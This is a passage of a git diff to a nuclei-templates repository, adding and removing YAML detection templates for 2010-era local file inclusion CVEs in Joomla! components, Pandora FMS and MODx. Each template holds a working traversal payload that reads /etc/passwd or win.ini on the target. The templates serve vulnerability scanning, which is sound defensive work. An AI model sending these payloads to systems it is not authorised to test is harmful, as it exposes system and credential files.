allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. - reference: - - https://www.exploit-db.com/exploits/15643 - - https://www.cvedetails.com/cve/CVE-2010-4282 - - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - - http://www.exploit-db.com/exploits/15643 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4282 - tags: cve,cve2010,lfi,joomla,phpshowtime - -requests: - - method: GET - path: - - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4617.yaml b/nuclei-templates/CVE-2010/CVE-2010-4617.yaml deleted file mode 100644 index f172f0e5d8..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4617.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2010-4617 - -info: - name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15791 - - https://www.cvedetails.com/cve/CVE-2010-4617 - - http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4617 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml deleted file mode 100644 index a9ab51ae4f..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2010-4719 - -info: - name: Joomla! Component JRadio - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/15749 - - https://www.cvedetails.com/cve/CVE-2010-4719 - - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt - - http://www.exploit-db.com/exploits/15749 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2010-4719 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-4769.yaml b/nuclei-templates/CVE-2010/CVE-2010-4769.yaml new file mode 100644 index 0000000000..3613fefedc --- /dev/null +++ b/nuclei-templates/CVE-2010/CVE-2010-4769.yaml @@ -0,0 +1,34 @@ +id: CVE-2010-4769 + +info: + name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion + author: daffainfo + severity: high + description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/15585 + - https://www.cvedetails.com/cve/CVE-2010-4769 + - http://secunia.com/advisories/42324 + - http://www.securityfocus.com/bid/44992 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-4769 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/17 diff --git a/nuclei-templates/CVE-2010/CVE-2010-5278.yaml b/nuclei-templates/CVE-2010/CVE-2010-5278.yaml deleted file mode 100644 index 7bc17d9f24..0000000000 --- a/nuclei-templates/CVE-2010/CVE-2010-5278.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2010-5278 - -info: - name: MODx manager - Local File Inclusion - author: daffainfo - severity: high - description: A directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl and possibly earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter when magic_quotes_gpc is disabled. - reference: - - https://www.exploit-db.com/exploits/34788 - - https://www.cvedetails.com/cve/CVE-2010-5278 - - http://packetstormsecurity.org/1009-exploits/modx202pl-lfi.txt - - http://secunia.com/advisories/41638 - classification: - cve-id: CVE-2010-5278 - tags: cve,cve2010,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and - part: body - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2010/cve-2010-0944.yaml b/nuclei-templates/CVE-2010/cve-2010-0944.yaml deleted file mode 100644 index 075c61c086..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-0944.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-0944 - -info: - name: Joomla! Component com_jcollection - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11088 - - https://www.cvedetails.com/cve/CVE-2010-0944 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1217.yaml b/nuclei-templates/CVE-2010/cve-2010-1217.yaml deleted file mode 100644 index a16a2b9e55..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1217.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1217 - -info: - name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. - reference: - - https://www.exploit-db.com/exploits/11814 - - https://www.cvedetails.com/cve/CVE-2010-1217 - tags: cve,cve2010,joomla,lfi,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1305.yaml b/nuclei-templates/CVE-2010/cve-2010-1305.yaml new file mode 100644 index 0000000000..ca2155a2d3 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1305.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1305 + +info: + name: Joomla! Component JInventory 1.23.02 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12065 + - https://www.cvedetails.com/cve/CVE-2010-1305 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1306.yaml b/nuclei-templates/CVE-2010/cve-2010-1306.yaml deleted file mode 100644 index 7a3b6a6390..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1306.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1306 - -info: - name: Joomla! Component Picasa 2.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12058 - - https://www.cvedetails.com/cve/CVE-2010-1306 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1469.yaml b/nuclei-templates/CVE-2010/cve-2010-1469.yaml new file mode 100644 index 0000000000..d06c195c18 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1469.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1469 + +info: + name: Joomla! Component JProject Manager 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12146 + - https://www.cvedetails.com/cve/CVE-2010-1469 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1470.yaml b/nuclei-templates/CVE-2010/cve-2010-1470.yaml deleted file mode 100644 index bcb3e84703..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1470.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1470 - -info: - name: Joomla! Component Web TV 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12166 - - https://www.cvedetails.com/cve/CVE-2010-1470 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1473.yaml b/nuclei-templates/CVE-2010/cve-2010-1473.yaml new file mode 100644 index 0000000000..c2e7878067 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1473.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1473 + +info: + name: Joomla! Component Advertising 0.25 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12171 + - https://www.cvedetails.com/cve/CVE-2010-1473 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1474.yaml b/nuclei-templates/CVE-2010/cve-2010-1474.yaml deleted file mode 100644 index bad1b8ef59..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1474.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1474 - -info: - name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12182 - - https://www.cvedetails.com/cve/CVE-2010-1474 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1475.yaml b/nuclei-templates/CVE-2010/cve-2010-1475.yaml new file mode 100644 index 0000000000..44a2dd1650 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1475.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1475 + +info: + name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12147 + - https://www.cvedetails.com/cve/CVE-2010-1475 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1476.yaml b/nuclei-templates/CVE-2010/cve-2010-1476.yaml deleted file mode 100644 index c1718acac9..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1476.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1476 - -info: - name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12150 - - https://www.cvedetails.com/cve/CVE-2010-1476 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1478.yaml b/nuclei-templates/CVE-2010/cve-2010-1478.yaml new file mode 100644 index 0000000000..850f9aa938 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1478.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1478 + +info: + name: Joomla! Component Jfeedback 1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12145 + - https://www.cvedetails.com/cve/CVE-2010-1478 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1540.yaml b/nuclei-templates/CVE-2010/cve-2010-1540.yaml new file mode 100644 index 0000000000..b0afe05f6e --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1540.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1540 + +info: + name: Joomla! Component com_blog - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: | + - https://www.exploit-db.com/exploits/11625 + - https://www.cvedetails.com/cve/CVE-2010-1540 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1601.yaml b/nuclei-templates/CVE-2010/cve-2010-1601.yaml deleted file mode 100644 index 40716c0829..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1601.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1601 - -info: - name: Joomla! Component JA Comment - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12236 - - https://www.cvedetails.com/cve/CVE-2010-1601 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1603.yaml b/nuclei-templates/CVE-2010/cve-2010-1603.yaml deleted file mode 100644 index dc2b52c09b..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1603.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1603 - -info: - name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12284 - - https://www.cvedetails.com/cve/CVE-2010-1603 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1607.yaml b/nuclei-templates/CVE-2010/cve-2010-1607.yaml new file mode 100644 index 0000000000..81f69a9578 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1607.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1607 + +info: + name: Joomla! Component WMI 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12316 + - https://www.cvedetails.com/cve/CVE-2010-1607 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1715.yaml b/nuclei-templates/CVE-2010/cve-2010-1715.yaml new file mode 100644 index 0000000000..6eabdff378 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1715.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1715 + +info: + name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + reference: + - https://www.exploit-db.com/exploits/12174 + - https://www.cvedetails.com/cve/CVE-2010-1715 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-1723.yaml b/nuclei-templates/CVE-2010/cve-2010-1723.yaml deleted file mode 100644 index 4b5060444b..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1723.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1723 - -info: - name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12289 - - https://www.cvedetails.com/cve/CVE-2010-1723 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1858.yaml b/nuclei-templates/CVE-2010/cve-2010-1858.yaml deleted file mode 100644 index 084d817de4..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1858.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1858 - -info: - name: Joomla! Component SMEStorage - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/11853 - - https://www.cvedetails.com/cve/CVE-2010-1858 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1871.yaml b/nuclei-templates/CVE-2010/cve-2010-1871.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1871.yaml rename to nuclei-templates/CVE-2010/cve-2010-1871.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1873.yaml b/nuclei-templates/CVE-2010/cve-2010-1873.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1873.yaml rename to nuclei-templates/CVE-2010/cve-2010-1873.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1953.yaml b/nuclei-templates/CVE-2010/cve-2010-1953.yaml deleted file mode 100644 index 106ad37fdc..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1953.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1953 - -info: - name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12288 - - https://www.cvedetails.com/cve/CVE-2010-1953 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1954.yaml b/nuclei-templates/CVE-2010/cve-2010-1954.yaml new file mode 100644 index 0000000000..15235070e6 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1954.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1954 + +info: + name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12287 + - https://www.cvedetails.com/cve/CVE-2010-1954 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1955.yaml b/nuclei-templates/CVE-2010/cve-2010-1955.yaml new file mode 100644 index 0000000000..932f7d5fe8 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1955.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1955 + +info: + name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12238 + - https://www.cvedetails.com/cve/CVE-2010-1955 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1956.yaml b/nuclei-templates/CVE-2010/cve-2010-1956.yaml new file mode 100644 index 0000000000..a9e931f712 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1956.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1956 + +info: + name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12285 + - https://www.cvedetails.com/cve/CVE-2010-1956 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1981.yaml b/nuclei-templates/CVE-2010/cve-2010-1981.yaml deleted file mode 100644 index bb141c636c..0000000000 --- a/nuclei-templates/CVE-2010/cve-2010-1981.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1981 - -info: - name: Joomla! Component Fabrik 2.0 - Local File Inclusion - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/12087 - - https://www.cvedetails.com/cve/CVE-2010-1981 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-1983.yaml b/nuclei-templates/CVE-2010/cve-2010-1983.yaml new file mode 100644 index 0000000000..2c169b3f5c --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1983.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1983 + +info: + name: Joomla! Component redTWITTER 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php + reference: + - https://www.exploit-db.com/exploits/12055 + - https://www.cvedetails.com/cve/CVE-2010-1983 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/cve-2010-2033.yaml new file mode 100644 index 0000000000..19eba6d68b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2033.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2033 + +info: + name: Joomla Percha Categories Tree 0.6 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html + - https://www.cvedetails.com/cve/CVE-2010-2033 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - 